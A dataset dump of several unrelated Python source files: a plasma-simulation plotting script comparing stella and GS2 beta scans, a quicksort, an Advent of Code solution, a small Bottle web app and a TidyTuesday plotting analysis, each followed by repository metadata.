\"\"\"Compare sims, all with fbpar=1, fapar=1, beta=0.01, for which\n we try turning on and off different knobs.\"\"\"\n\n # make_comparison_plots_for_poster([\n # sim_st_b01,\n # sim_gs2_b01\n # ],\n # [\n # \"stella\",\n # \"GS2\"\n # ],\n # \"images/beta_0.01_poster\",\n # sim_types=[\n # \"stella\",\n # \"gs2\"\n # ],\n #\n # )\n\n make_comparison_plots_for_poster([\n sim_st_b03,\n sim_gs2_b03,\n #sim_gs2_b03_hvr,\n ],\n [\n \"stella\",\n \"gs2\",\n # \"gs2, hvr\",\n ],\n IMAGE_DIR + \"beta=0.03_poster\",\n sim_types=[\n \"stella\",\n \"gs2\",\n #\"gs2\",\n ],\n\n )\n\n\n #compare_omega_for_fbpar0_changing_streaming_and_drive()\n\n return\n\ndef plot_fbpar0_beta0001_equal_masses():\n \"\"\"Compare sims, all with fbpar=0, fapar=1, beta=0.001, for which\n we try turning on and off different knobs.\"\"\"\n\n make_comparison_plots([\n sim_st_b001_fbpar0,\n sim_gs2_b001_fbpar0,\n sim_st_b001_fbpar0_equal_masses,\n sim_gs2_b001_fbpar0_equal_masses,\n ],\n [\n \"stella\",\n \"GS2\",\n \"stella, m_e=1\",\n \"GS2, m_e=1\",\n ],\n \"./termsoff_beta_0.001_fbpar0_me1\",\n sim_types=[\n \"stella\",\n \"gs2\",\n \"stella\",\n \"gs2\",\n ],\n plot_apar=True,\n plot_format=\".eps\"\n )\n return\n\ndef analyse_fbpar0_results():\n \"\"\"Compare omega(t) and phi(z), apar(z)\n between GS2 and stella results \"\"\"\n\n print(\"Hello world\")\n beta_strs = [\n\n ]\n stella_sim_longnames = [\n\n ]\n gs2_sim_longnames = [\n\n ]\n for beta_idx in range(0, len(beta_strs)):\n stella_sim_longname = stella_sim_longnames[beta_idx]\n gs2_sim_longname = gs2_sim_longnames[beta_idx]\n beta_str = beta_strs[beta_idx]\n make_comparison_plots([\n stella_sim_longname,\n gs2_sim_longname,\n ],\n [\n \"stella\",\n \"GS2\",\n ],\n \"./beta_\" + beta_str + \"_fbpar0\",\n sim_types=[\n \"stella\",\n \"gs2\",\n ],\n plot_apar=True,\n )\n return\n\ndef analyse_fapar0_results():\n \"\"\"Compare omega(t) and phi(z), apar(z)\n between GS2 and stella results \"\"\"\n\n print(\"Hello world\")\n beta_strs = [\n \"0.00001\",\n \"0.001\",\n \"0.002\",\n #\"0.010\",\n ]\n stella_sim_longnames = [\n\n ]\n gs2_sim_longnames = [\n\n ]\n for beta_idx in range(0, len(beta_strs)):\n stella_sim_longname = stella_sim_longnames[beta_idx]\n gs2_sim_longname = gs2_sim_longnames[beta_idx]\n beta_str = beta_strs[beta_idx]\n make_comparison_plots([\n stella_sim_longname,\n gs2_sim_longname,\n ],\n [\n \"stella\",\n \"GS2\",\n ],\n \"./beta_\" + beta_str + \"_fapar0\",\n sim_types=[\n \"stella\",\n \"gs2\",\n ],\n plot_bpar=True,\n plot_format=\".png\"\n )\n # plot_gmvus(\"stella_beta0.001_fapar0/input.out.nc\")\n print(\"stella_sim_longname = \", stella_sim_longname)\n print(\"gs2_sim_longname = \", gs2_sim_longname)\n gs2_bpar_ratio = find_bpar_phi_ratio(gs2_sim_longname, \"gs2\")\n stella_bpar_ratio = find_bpar_phi_ratio(stella_sim_longname, \"stella\")\n print(\"gs2_bpar_ratio = \", gs2_bpar_ratio)\n print(\"stella_bpar_ratio2 = \", stella_bpar_ratio)\n\n return\n\ndef analyse_fapar0_changing_vpares():\n \"\"\"Compare omega(t) and phi(z), apar(z)\n between GS2 and stella results \"\"\"\n\n print(\"Hello world\")\n\n stella_sim1_longname = \"stella_beta0.010_fapar0/input\"\n stella_sim2_longname = \"stella_beta0.010_fapar0_higher_vpa/input\"\n\n gs2_sim1_longname = \"gs2_beta_scan_fapar0/_0.0100\"\n\n # make_comparison_plots([\n # stella_sim1_longname,\n # stella_sim2_longname,\n # gs2_sim1_longname\n # ],\n # [\n # \"stella\",\n # \"stella, higher vpa\",\n # \"GS2\",\n # ],\n # \"./beta_0.01_fapar0_varying_vpares\",\n # sim_types=[\n # \"stella\",\n # \"stella\",\n # \"gs2\",\n # ],\n # plot_bpar=True,\n # )\n #\n gs2_bpar_ratio = find_bpar_phi_ratio(gs2_sim1_longname, \"gs2\")\n stella_bpar_ratio1 = find_bpar_phi_ratio(stella_sim1_longname, \"stella\")\n stella_bpar_ratio2 = find_bpar_phi_ratio(stella_sim2_longname, \"stella\")\n print(\"gs2_bpar_ratio = \", gs2_bpar_ratio)\n print(\"stella_bpar_ratio1 = \", stella_bpar_ratio1)\n print(\"stella_bpar_ratio2 = \", stella_bpar_ratio2)\n # plot_gmvus(\"stella_beta0.001_fapar0/input.out.nc\", which=\"gvpa\")\n # plot_gmvus(\"stella_beta0.010_fapar0_higher_vpa/input.out.nc\", which=\"gvpa\")\n return\n\ndef plot_g():\n \"\"\" \"\"\"\n stella_outnc_longname = \"stella_beta0.001_fbpar0/input.out.nc\"\n gs2_outnc_longname = \"gs2_beta_scan_fbpar0/_0.0010.out.nc\"\n #view_ncdf_variables(stella_outnc_longname)\n #view_ncdf_variables(gs2_outnc_longname)\n plot_gmvus(stella_outnc_longname)\n\n sys.exit()\n\n time, theta, gs2_energy, gs2_lambda = extract_data_from_ncdf(gs2_outnc_longname,\n 't', 'theta', 'energy', 'lambda')\n print(\"len(time), len(theta), len(energy), len(lambda) = \", len(time), len(theta), len(gs2_energy), len(gs2_lambda))\n gs2_g = np.loadtxt(\"gs2_beta_scan_fbpar0/_0.0100.dist\", skiprows=1)\n print(\"gs2_g.shape = \", gs2_g.shape)\n # GS2's g is in a set of (n(energy)*n(lambda)) x 8 blocks.\n # Each row is vpa, vpe, energy(ie,is), al(il), xpts(ie,is), ypts(il), real(gtmp(1)), real(gtmp(2))\n # The number of blocks is nstep/(nwrite*nwrite_mul)\n block_size = len(gs2_energy) * len(gs2_lambda)\n nblocks = len(gs2_g)/block_size\n final_step_g = gs2_g[-block_size:, :]\n print(\"len(final_step_g), block_size = \", len(final_step_g), block_size)\n\n ## Code to plot g for GS2\n # gvmus = gvmus[-1] # spec, mu, vpa\n # fig = plt.figure()\n # ax1 = fig.add_subplot(211)\n # ax2 = fig.add_subplot(212)\n # counter=0\n #\n # for mu_idx in range(0, len(mu)):\n # counter += 1\n # g_ion_vpa = gvmus[0, mu_idx, :]\n # g_electron_vpa = gvmus[1, mu_idx, :]\n # ax1.plot(vpa, g_ion_vpa)\n # ax2.plot(vpa, g_electron_vpa)\n #\n # if counter == 5:\n # plt.show()\n # fig = plt.figure()\n # ax1 = fig.add_subplot(211)\n # ax2 = fig.add_subplot(212)\n # counter=0\n #\n # plt.show()\n\n return\n\ndef plot_geometry():\n \"\"\" \"\"\"\n stella_outnc_longname = \"stella_beta0.001_fbpar0/input.out.nc\"\n gs2_outnc_longname = \"gs2_beta_scan_fbpar0/_0.0010.out.nc\"\n\n z, gds2, gds21, gds22, bmag, gradpar = extract_data_from_ncdf(stella_outnc_longname,\n 'zed', 'gds2', 'gds21', 'gds22', 'bmag', 'gradpar')\n\n # Code to compare geometry between stella and gs2\n fig = plt.figure()\n ax1 = fig.add_subplot(211)\n ax2 = fig.add_subplot(212)\n ax1.plot(z, gds2)\n ax1.plot(z, gds21)\n ax1.plot(z, gds22)\n ax2.plot(z, bmag)\n ax2.plot(z, gradpar)\n\n theta, gds2, gds21, gds22, bmag, gradpar = extract_data_from_ncdf(gs2_outnc_longname,\n 'theta', 'gds2', 'gds21', 'gds22', 'bmag', 'gradpar')\n ax1.plot(theta, gds2, linestyle=\"-.\")\n ax1.plot(theta, gds21, linestyle=\"-.\")\n ax1.plot(theta, gds22, linestyle=\"-.\")\n ax2.plot(theta, bmag, linestyle=\"-.\")\n ax2.plot(theta, gradpar, linestyle=\"-.\")\n\n\n plt.show()\n\n return\n\ndef plot_beta_scans():\n \"\"\" \"\"\"\n stella_sim_longnames = [\n sim_st_b0,\n sim_st_b005,\n sim_st_b01,\n sim_st_b015,\n sim_st_b02,\n sim_st_b025,\n sim_st_b03,\n ]\n gs2_sim_longnames = [\n\n ]\n stella_beta_vals = [\n 0.0,\n 0.005,\n 0.01,\n 0.015,\n 0.02,\n 0.025,\n 0.03\n ]\n\n\n make_beta_scan_plots(stella_sim_longnames,\n stella_beta_vals,\n \"images/test_cbc_beta_scan\",\n )\n\n # stella_sim_longnames = [\n #\n # ]\n # stella_beta_vals = [\n # 0.0,\n # 0.001,\n # 0.002,\n # 0.003,\n # 0.004,\n # 0.005,\n # ]\n #\n #\n #\n # make_beta_scan_plots(stella_sim_longnames,\n # stella_beta_vals,\n # \"./test_cbc_beta_scan_fbpar0\",\n # gs2_pickle=gs2_pickle\n # )\n return\n\ndef compare_vres_fbpar0():\n \"\"\" \"\"\"\n stella_sim_longname = \"stella_beta0.010_fbpar0/input\"\n stella_sim_longname_higher_vpa = \"stella_beta0.010_fbpar0_higher_vpa/input\"\n stella_outnc_longname = stella_sim_longname + \".out.nc\"\n stella_outnc_longname_higher_vpa = stella_sim_longname_higher_vpa + \".out.nc\"\n make_comparison_plots([\n stella_sim_longname,\n stella_sim_longname_higher_vpa,\n ],\n [\n \"nvgrid=36\",\n \"nvgrid=108\",\n ],\n \"./beta0.01_fbpar0_vpa_res_test\",\n sim_types=[\n \"stella\",\n \"stella\",\n ],\n plot_apar=True,\n )\n return\n\ndef compare_omega_for_fbpar0_zero_drive():\n \"\"\" \"\"\"\n\n make_comparison_plots([\n sim_st_b001_fbpar0_no_drive,\n sim_st_b001_fbpar0_no_drive_mid_vres,\n #sim_st_b001_fbpar0_no_drive_higher_vres,\n sim_st_b001_fbpar0_no_drive_lower_dt,\n sim_gs2_b001_fbpar0,\n ],\n [\n \"stella, zero drive\",\n \"stella, zero drive, mid vres\",\n #\"stella, zero drive, higher vres\",\n \"stella, zero drive, lower dt\",\n \"GS2\",\n ],\n IMAGE_DIR + \"fbpar0_beta1e-3_zerodrive\",\n sim_types=[\n \"stella\",\n \"stella\",\n \"stella\",\n #\"stella\",\n \"gs2\",\n ],\n plot_apar=True,\n plot_bpar=False,\n plot_format=\".png\"\n )\n\ndef compare_omega_for_fbpar0_zero_drive_change_upwind():\n \"\"\" \"\"\"\n\n make_comparison_plots([\n sim_st_b001_fbpar0_no_drive,\n sim_st_b001_fbpar0_no_drive_0_upwind,\n sim_st_b001_fbpar0_no_drive_01_upwind,\n sim_st_b001_fbpar0_no_drive_02_upwind,\n sim_gs2_b001_fbpar0,\n ],\n [\n \"stella, zero drive\",\n \"stella, zero drive, z & vpa upwind=0\",\n \"stella, zero drive, z & vpa upwind=0.1\",\n \"stella, zero drive, z & vpa upwind=0.2\",\n \"GS2\",\n ],\n IMAGE_DIR + \"fbpar0_beta1e-3_zerodrive_scan_upwind\",\n sim_types=[\n \"stella\",\n \"stella\",\n \"stella\",\n \"stella\",\n \"gs2\",\n ],\n plot_apar=True,\n plot_bpar=False,\n plot_format=\".png\"\n )\n\ndef compare_omega_for_fbpar0_changing_streaming_and_drive():\n \"\"\" \"\"\"\n make_comparison_plots([\n sim_st_b001_fbpar0,\n sim_st_b001_fbpar0_no_drive,\n sim_st_b001_fbpar0_no_stream_no_mirror,\n sim_st_b001_fbpar0_no_drive_no_stream_no_mirror,\n sim_st_b001_fbpar0_no_drive_no_drifts\n ],\n [\n \"stella\",\n \"stella, zero drive\",\n \"stella, zero streaming & mirror\",\n \"stella, zero drive, zero streaming & mirror\",\n \"stella, zero drive, zero drifts\",\n ],\n IMAGE_DIR + \"fbpar0_beta1e-3_zerodrive_change_str_mirr\",\n sim_types=[\n \"stella\",\n \"stella\",\n \"stella\",\n \"stella\",\n \"stella\",\n ],\n plot_apar=True,\n plot_bpar=False,\n plot_format=\".png\", show_fig=True\n )\n\ndef compare_beta03():\n \"\"\" \"\"\"\n make_comparison_plots([\n sim_st_b03,\n sim_gs2_b03,\n sim_gs2_b03_hvr,\n ],\n [\n \"stella\",\n \"gs2\",\n \"gs2, higher vres\",\n ],\n IMAGE_DIR + \"beta=0.03\",\n sim_types=[\n \"stella\",\n \"gs2\",\n \"gs2\",\n ],\n plot_apar=True,\n plot_bpar=True,\n plot_format=\".png\", show_fig=True\n )\n\ndef compare_beta03_detailed():\n \"\"\" \"\"\"\n\n fig = plt.figure()\n ax1 = fig.add_subplot(211)\n ax2 = fig.add_subplot(212, sharex=ax1)\n\n sim_gs2_b03_outnc = sim_gs2_b03 + \".out.nc\"\n theta, gds2, gds21, gds22, bmag, gradpar = extract_data_from_ncdf(sim_gs2_b03_outnc,\n 'theta', 'gds2', 'gds21', 'gds22', 'bmag', 'gradpar')\n ax1.plot(theta/np.pi, gds2, c=\"black\")\n ax1.plot(theta/np.pi, gds21, ls=\"--\", c=\"black\")\n ax1.plot(theta/np.pi, gds22, ls=\"-.\", c=\"black\")\n ax2.plot(theta/np.pi, bmag, c=\"black\")\n ax2.plot(theta/np.pi, gradpar, ls=\"--\", c=\"black\")\n\n sim_st_b03_outnc = sim_st_b03 + \".out.nc\"\n theta, gds2, gds21, gds22, bmag, gradpar = extract_data_from_ncdf(sim_st_b03_outnc,\n 'zed', 'gds2', 'gds21', 'gds22', 'bmag', 'gradpar')\n ax1.plot(theta/np.pi, gds2, c=\"red\")\n ax1.plot(theta/np.pi, gds21, ls=\"--\", c=\"red\")\n ax1.plot(theta/np.pi, gds22, ls=\"-.\", c=\"red\")\n ax2.plot(theta/np.pi, bmag, c=\"red\")\n ax2.plot(theta/np.pi, gradpar, ls=\"--\", c=\"red\")\n\n plt.show()\n\n make_comparison_plots([\n sim_st_b03,\n sim_gs2_b03,\n ],\n [\n \"stella\",\n \"gs2\",\n ],\n IMAGE_DIR + \"beta=0.03\",\n sim_types=[\n \"stella\",\n \"gs2\",\n ],\n plot_apar=True,\n plot_bpar=True,\n plot_format=\".png\", show_fig=False\n )\n make_comparison_plots([\n sim_st_b03_fbpar0,\n sim_gs2_b03_fbpar0,\n ],\n [\n \"stella\",\n \"gs2\",\n ],\n IMAGE_DIR + \"beta=0.03_fbpar0\",\n sim_types=[\n \"stella\",\n \"gs2\",\n ],\n plot_apar=True,\n plot_bpar=False,\n plot_format=\".png\", show_fig=False\n )\n make_comparison_plots([\n sim_st_b03_fapar0,\n sim_gs2_b03_fapar0,\n ],\n [\n \"stella\",\n \"gs2\",\n ],\n IMAGE_DIR + \"beta=0.03_fapar0\",\n sim_types=[\n \"stella\",\n \"gs2\",\n ],\n plot_apar=False,\n plot_bpar=True,\n plot_format=\".png\", show_fig=False\n )\n return\n\ndef plot_g_for_fbpar0_different_terms_off():\n \"\"\"Take a look at the distribrution function for\n fbpar=0 sims with beta=1e-3 and various terms on/off \"\"\"\n\n stella_outnc_longname = sim_st_b001_fbpar0 + \".out.nc\"\n stella_outnc_longname_no_mirror = sim_st_b001_fbpar0_no_mirror + \".out.nc\"\n\n plot_gmvus(stella_outnc_longname)\n plot_gzvs(stella_outnc_longname)\n print(\"Now no mirror:\")\n plot_gmvus(stella_outnc_longname_no_mirror)\n plot_gzvs(stella_outnc_longname_no_mirror)\n\n\n return\n\ndef plot_gzvs_for_fbpar0():\n \"\"\"Take a look at the distribrution function for\n fbpar=0 sims \"\"\"\n\n stella_sim_longname = \"stella_beta0.010_fbpar0/input\"\n stella_outnc_longname = stella_sim_longname + \".out.nc\"\n plot_gzvs(stella_outnc_longname)\n\n\n return\n\ndef make_comparison_plots_many(stella_sim_longnames, gs2_sim_longnames,\n beta_strs, prefix, plot_apar = False,\n plot_bpar = False, plot_format=\".png\"):\n \"\"\" \"\"\"\n\n for beta_idx in range(0, len(beta_strs)):\n stella_sim_longname = stella_sim_longnames[beta_idx]\n gs2_sim_longname = gs2_sim_longnames[beta_idx]\n beta_str = beta_strs[beta_idx]\n make_comparison_plots([\n stella_sim_longname,\n gs2_sim_longname,\n ],\n [\n \"stella\",\n \"GS2\",\n ],\n IMAGE_DIR + prefix + \"beta_\" + beta_str,\n sim_types=[\n \"stella\",\n \"gs2\",\n ],\n plot_apar=plot_apar,\n plot_bpar=plot_bpar,\n plot_format=plot_format\n )\n\ndef plot_fapar_fbpar_on():\n \"\"\" \"\"\"\n ## Beta scan\n stella_sim_longnames = [\n sim_st_b0,\n sim_st_b005,\n sim_st_b01,\n sim_st_b015,\n sim_st_b02,\n sim_st_b025,\n sim_st_b03\n ]\n stella_beta_vals = [\n 0.,\n 0.005,\n 0.01,\n 0.015,\n 0.02,\n 0.025,\n 0.03,\n ]\n stella_labels = [\n \"beta=0.\",\n \"beta=0.005\",\n \"beta=0.01\",\n \"beta=0.015\",\n \"beta=0.02\",\n \"beta=0.025\",\n \"beta=0.03\",\n ]\n make_comparison_plots(stella_sim_longnames,\n stella_labels,\n \"images/omega_beta_scan/fapar1_fbpar1_beta_scan\",\n plot_apar=True, plot_bpar=True, plot_format=\".eps\")\n\n make_beta_scan_plots(stella_sim_longnames,\n [],\n stella_beta_vals,\n IMAGE_DIR + \"test_cbc_beta_scan\",\n gs2_pickle=pickle_gs2)\n\n return\n\ndef plot_fapar0():\n \"\"\" \"\"\"\n stella_sim_longnames = [\n sim_st_b00001_fapar0,\n sim_st_b001_fapar0,\n sim_st_b002_fapar0,\n sim_st_b01_fapar0,\n ]\n gs2_sim_longnames = [\n sim_gs2_b00001_fapar0,\n sim_gs2_b001_fapar0,\n sim_gs2_b002_fapar0,\n sim_gs2_b01_fapar0\n ]\n beta_strs = [\n \"0.00001\",\n \"0.001\",\n \"0.002\",\n \"0.01\"\n ]\n # make_comparison_plots_many(stella_sim_longnames,\n # gs2_sim_longnames,\n # beta_strs, \"fapar=0/\", plot_apar=False, plot_bpar=True)\n\n make_beta_scan_plots(stella_sim_longnames,\n gs2_sim_longnames,\n beta_strs,\n IMAGE_DIR + \"test_cbc_beta_scan_fapar0\",\n )\n\n return\n\ndef plot_fbpar0():\n \"\"\" \"\"\"\n stella_sim_longnames = [\n sim_st_b00001_fbpar0,\n sim_st_b00005_fbpar0,\n sim_st_b0001_fbpar0,\n sim_st_b0003_fbpar0,\n sim_st_b0006_fbpar0,\n #sim_st_b001_fbpar0,\n sim_st_b0015_fbpar0,\n sim_st_b002_fbpar0,\n sim_st_b003_fbpar0,\n sim_st_b004_fbpar0,\n sim_st_b005_fbpar0,\n sim_st_b01_fbpar0\n ]\n\n gs2_sim_longnames = [\n sim_gs2_b00001_fbpar0,\n sim_gs2_b001_fbpar0,\n sim_gs2_b001_fbpar0,\n sim_gs2_b001_fbpar0,\n sim_gs2_b001_fbpar0,\n #sim_gs2_b001_fbpar0,\n sim_gs2_b001_fbpar0,\n sim_gs2_b002_fbpar0,\n sim_gs2_b003_fbpar0,\n sim_gs2_b004_fbpar0,\n sim_gs2_b005_fbpar0,\n sim_gs2_b01_fbpar0\n ]\n beta_strs = [\n \"0.00001\",\n \"0.00005\",\n \"0.0001\",\n \"0.0003\",\n \"0.0006\",\n \"0.001\",\n \"0.0015\",\n \"0.002\",\n \"0.003\",\n \"0.004\",\n \"0.005\",\n \"0.01\"\n ]\n # make_comparison_plots_many(stella_sim_longnames,\n # gs2_sim_longnames,\n # beta_strs, \"fbpar=0/\", plot_apar=True, plot_bpar=False)\n make_beta_scan_plots(stella_sim_longnames,\n gs2_sim_longnames,\n beta_strs,\n IMAGE_DIR + \"test_cbc_beta_scan_fbpar0\",\n )\n return\n\ndef plot_fbpar0_with_gs2_pickle():\n \"\"\" \"\"\"\n stella_sim_longnames = [\n sim_st_b00001_fbpar0,\n sim_st_b00005_fbpar0,\n sim_st_b0001_fbpar0,\n sim_st_b0003_fbpar0,\n sim_st_b0006_fbpar0,\n #sim_st_b001_fbpar0,\n sim_st_b0015_fbpar0,\n sim_st_b002_fbpar0,\n sim_st_b003_fbpar0,\n sim_st_b004_fbpar0,\n sim_st_b005_fbpar0,\n sim_st_b01_fbpar0\n ]\n\n gs2_sim_longnames = [\n ]\n beta_strs = [\n \"0.00001\",\n \"0.00005\",\n \"0.0001\",\n \"0.0003\",\n \"0.0006\",\n \"0.001\",\n \"0.0015\",\n \"0.002\",\n \"0.003\",\n \"0.004\",\n \"0.005\",\n \"0.01\"\n ]\n # make_comparison_plots_many(stella_sim_longnames,\n # gs2_sim_longnames,\n # beta_strs, \"fbpar=0/\", plot_apar=True, plot_bpar=False)\n make_beta_scan_plots(stella_sim_longnames,\n [],\n beta_strs,\n IMAGE_DIR + \"test_cbc_beta_scan_fbpar0\",\n gs2_pickle=pickle_gs2_fbpar0 )\n return\n\ndef compare_get_fields_subroutines():\n \"\"\" \"\"\"\n make_comparison_plots(\n [\n sim_st_gfvmulo_nstep1000,\n sim_st_gf_nstep1000,\n ],\n [\n \"get_fields_vmulo\",\n \"get_fields\",\n ],\n IMAGE_DIR ,\n sim_types = [\n \"stella\",\n \"stella\",\n ],\n plot_apar=True,\n plot_bpar=True,\n plot_format=\".png\", show_fig=True\n )\n\n\n return\n\ndef make_all_plots():\n \"\"\" \"\"\"\n plot_fbpar0()\n plot_fapar_fbpar_on()\n plot_fapar0()\n compare_omega_for_fbpar0_zero_drive()\n compare_omega_for_fbpar0_zero_drive_change_upwind()\n analyse_fbpar0_beta0001_results()\n\n return\n\n\n\nif __name__ == \"__main__\":\n ## Compare\n\n #analyse_fbpar0_results()\n # plot_beta_scans()\n #analyse_results_for_poster()\n # plot_geometry()\n # make_low_beta_fbpar0_plots()\n # analyse_fapar0_results()\n # plot_gvmus_for_fbpar0()\n # analyse_fapar0_changing_vpares()\n #make_all_plots()\n #plot_gzvs_for_fbpar0()\n # plot_fapar0()\n # plot_fbpar0_with_gs2_pickle()\n # plot_fapar_fbpar_on()\n #plot_geometry()\n #compare_beta03()\n #compare_beta03_detailed()\n # compare_omega_for_fbpar0_changing_streaming_and_drive()\n #analyse_fbpar0_beta0001_results()\n #plot_fbpar0_beta0001_equal_masses()\n #plot_g_for_fbpar0_different_terms_off()\n #compare_omega_for_fbpar0_different_terms_off()\n # compare_omega_for_fbpar0_zero_drive()\n # compare_omega_for_fbpar0_zero_drive_change_upwind()\n #compare_omega_for_fbpar0_changing_streaming_and_drive()\n compare_get_fields_subroutines()\n","repo_name":"rd1042/stella_benchmarking_new","sub_path":"test_cbc_beta_scan/make_plots.py","file_name":"make_plots.py","file_ext":"py","file_size_in_byte":40321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22554733599","text":"import time\nimport random\nstart_time = time.time()\n\na = []\n\nfor i in range(0, 1000):\n num = random.randint(0, 1000)\n a.append(num)\n\ndef quicksort(array):\n if len(array) < 2:\n return array\n else:\n pivot = array[0]\n less = [i for i in array[1:] if i <= pivot]\n\n greater = [i for i in array[1:] if i > pivot]\n\n return quicksort(less) + [pivot] + quicksort(greater)\n\nprint(quicksort(a))\n\nprint(\"Process finished --- %s seconds ---\" % (time.time() - start_time))\n\n","repo_name":"RoukX/python-basic-algorithm","sub_path":"quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20000860977","text":"import fileinput\n\ndata = open('input.txt', 'r').read().splitlines()\n\nstacks = []\n\nfor i in range(1, len(data[0]) - 1, 4):\n stack = []\n for j, line in enumerate(data):\n if j == 8:\n break\n if line[i] != ' ':\n stack.insert(0, line[i])\n stacks.append(stack)\n\nmoves = data[10:]\n\ndef part_one():\n for move in moves:\n a = move.split(' ')\n a.remove('move')\n a.remove('from')\n a.remove('to')\n a = list(map(int, a))\n for i in range(a[0]):\n container = stacks[a[1] - 1].pop()\n stacks[a[2] - 1].append(container)\n\n for stack in stacks:\n print(stack.pop())\n\ndef part_two():\n for move in moves:\n a = move.split(' ')\n a.remove('move')\n a.remove('from')\n a.remove('to')\n a = list(map(int, a))\n \n containers = []\n for i in range(a[0]):\n container = stacks[a[1] - 1].pop()\n containers.insert(0, container)\n stacks[a[2] - 1].extend(containers)\n \n for stack in stacks:\n print(stack.pop())","repo_name":"Meerkoo/AoC2022","sub_path":"05/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13607629601","text":"\"\"\"\nimport os\nimport webapp\n# Change working directory so relative paths (and template lookup) work again\nos.chdir(os.path.dirname(__file__))\n\"\"\"\n\n\nfrom bottle import Bottle, run, static_file, view\nimport utils\n\n\ndef main():\n conf = utils.get_conf()\n\n host = conf[\"bottle\"][\"host\"]\n port = conf[\"bottle\"][\"port\"]\n route_statics = conf[\"bottle\"][\"route_statics\"]\n statics_path = conf[\"bottle\"][\"statics_path\"]\n video_paths = conf[\"bottle\"][\"video_paths\"]\n\n app = Bottle()\n\n if route_statics is True:\n @app.route('/static/')\n def server_static(filepath):\n return static_file(filepath, root=statics_path)\n\n @app.route('/')\n def index():\n return \"Hello World!\"\n\n @app.route('/videos')\n @view('views/videos.tpl')\n def videos():\n tpl_vars = dict()\n tpl_vars[\"video_paths\"] = video_paths\n return tpl_vars\n\n return app, host, port\n\n\n\n\n\n# ... build or import your bottle application here ...\n# Do NOT use bottle.run() with mod_wsgi\napplication, host, port = main()\n","repo_name":"berzelius/powa","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33492211817","text":"\nimport pandas as pd\nimport numpy as np\nhs_students = pd.read_csv('https://raw.githubusercontent.com/rfordatascience/tidytuesday/master/data/2021/2021-02-02/hs_students.csv')\nhbcu_all = pd.read_csv('https://raw.githubusercontent.com/rfordatascience/tidytuesday/master/data/2021/2021-02-02/hbcu_all.csv')\n\nhs_students.columns = ['Year', 'Total pop',\n 'Total pop se',\n 'White', 'White se', 'Black',\n 'Black se', 'Hispanic', 'Hispanic se',\n 'Total Apac',\n 'Total Apac se',\n 'Asian',\n 'Asian se',\n 'Pacific',\n 'Pacific se',\n 'Indian Native',\n 'Indian Native se',\n 'Mix race', 'Mix race se']\n\ndf1 = hs_students[['Year', 'Total pop',\n 'White', 'Black',\n 'Hispanic',\n 'Asian',\n 'Pacific',\n 'Indian Native',\n 'Mix race']]\n\n# np.where(condition, value if true, value if false)\ndf1['Year'] = np.where(df1['Year'] >= 10000, round(df1['Year']/10), df1['Year'])\n\ndf1.dropna(axis = 0, how = 'all', inplace = True)\n\n# Rename to make them readable as stubnames\ndf1.columns=['Year', 'Pop_Total', 'Pop_White', 'Pop_Black', 'Pop_Hispanic', 'Pop_Asian', 'Pop_Pacific',\n 'Pop_IndianNative', 'Pop_MixRace']\ndf1 = pd.wide_to_long(df1, stubnames='Pop', i=['Year'], j='Race', sep='_', suffix=r'\\w+')\ndf1 = df1.reset_index()\n\n\n\ndf2=df1.copy()\n\n# Window function on a dataframe \ndf1.Pop = pd.to_numeric(df1.Pop, errors='coerce').fillna(0).astype(int) # working\ndf1['rank_race'] = df1[df1.Pop>0].groupby('Race')['Year'].rank(method='first') # window funciton\ndf1[df1['rank_race']==1]\n\nrace_list = df1[df1['rank_race']==1].Race.to_list()\nyear_list = df1[df1['rank_race']==1].Year.to_list()\npop_list = df1[df1['rank_race']==1].Pop.to_list()\n\nfor yr in year_list:\n print(round((yr-1910)/100,1))\n\n\nimport plotly.express as px\n\n# color_list = ['dimgray', 'firebrick', 'olive', 'saddlebrown', 'steelblue', 'seagreen', 'darkviolet', 'crimson']\n\nfig = px.line(df2, x=\"Year\", y=\"Pop\", color='Race') # color='Race'\nannotations=[]\nfor yr,pop,race in zip(year_list,pop_list, race_list):\n annotations.append(dict(xref='paper', x=round((yr-1910)/100,1), y=pop,\n xanchor='right', yanchor='middle',\n text=race + ' {}%'.format(13.5),\n font=dict(family='Arial',\n size=12,color='black'),\n showarrow=False))\nfig.update_layout(annotations=annotations)\nfig.update_layout(\n autosize=False,\n width=950,\n height=1100,\n showlegend=False,\n #legend_title=\"Legend Title\",\n title=\"High school completion among persons age 25 and over\",\n xaxis_title=\"Year\",\n yaxis_title=\"Percent of population (persons age 25 and over)\",\n )\n#fig.write_image(\"2021-02-02/fig1.png\")\nfig.show()\n\n\n# df1 = df1.replace({ \"-\": np.nan, \"&\": np.nan })\n\n'''\n# wide to long format\ndf = pd.DataFrame({\n 'famid': [1, 1, 1, 2, 2, 2, 3, 3, 3],\n 'birth': [1, 2, 3, 1, 2, 3, 1, 2, 3],\n 'hta': [2.8, 2.9, 2.2, 2, 1.8, 1.9, 2.2, 2.3, 2.1],\n 'htb': [3.4, 3.8, 2.9, 3.2, 2.8, 2.4, 3.3, 3.4, 2.9]\n})\npd.wide_to_long(df, stubnames='ht', i=['famid', 'birth'], j='age')\n# above examples have integers as suffixes. It is possible to have non-integers as suffixes.\ndf = pd.DataFrame({\n 'famid': [1, 1, 1, 2, 2, 2, 3, 3, 3],\n 'birth': [1, 2, 3, 1, 2, 3, 1, 2, 3],\n 'ht_one': [2.8, 2.9, 2.2, 2, 1.8, 1.9, 2.2, 2.3, 2.1],\n 'ht_two': [3.4, 3.8, 2.9, 3.2, 2.8, 2.4, 3.3, 3.4, 2.9]\n})\npd.wide_to_long(df, stubnames='ht', i=['famid', 'birth'], j='age', sep='_', suffix=r'\\w+')\n'''\n\n","repo_name":"vivekparasharr/Challenges-and-Competitions","sub_path":"TidyTuesday/20210202-hbcu-enrollment.py","file_name":"20210202-hbcu-enrollment.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"20356029910","text":"import vedo\nfrom omegaconf import OmegaConf\nimport torch\nimport numpy as np\nfrom utils import 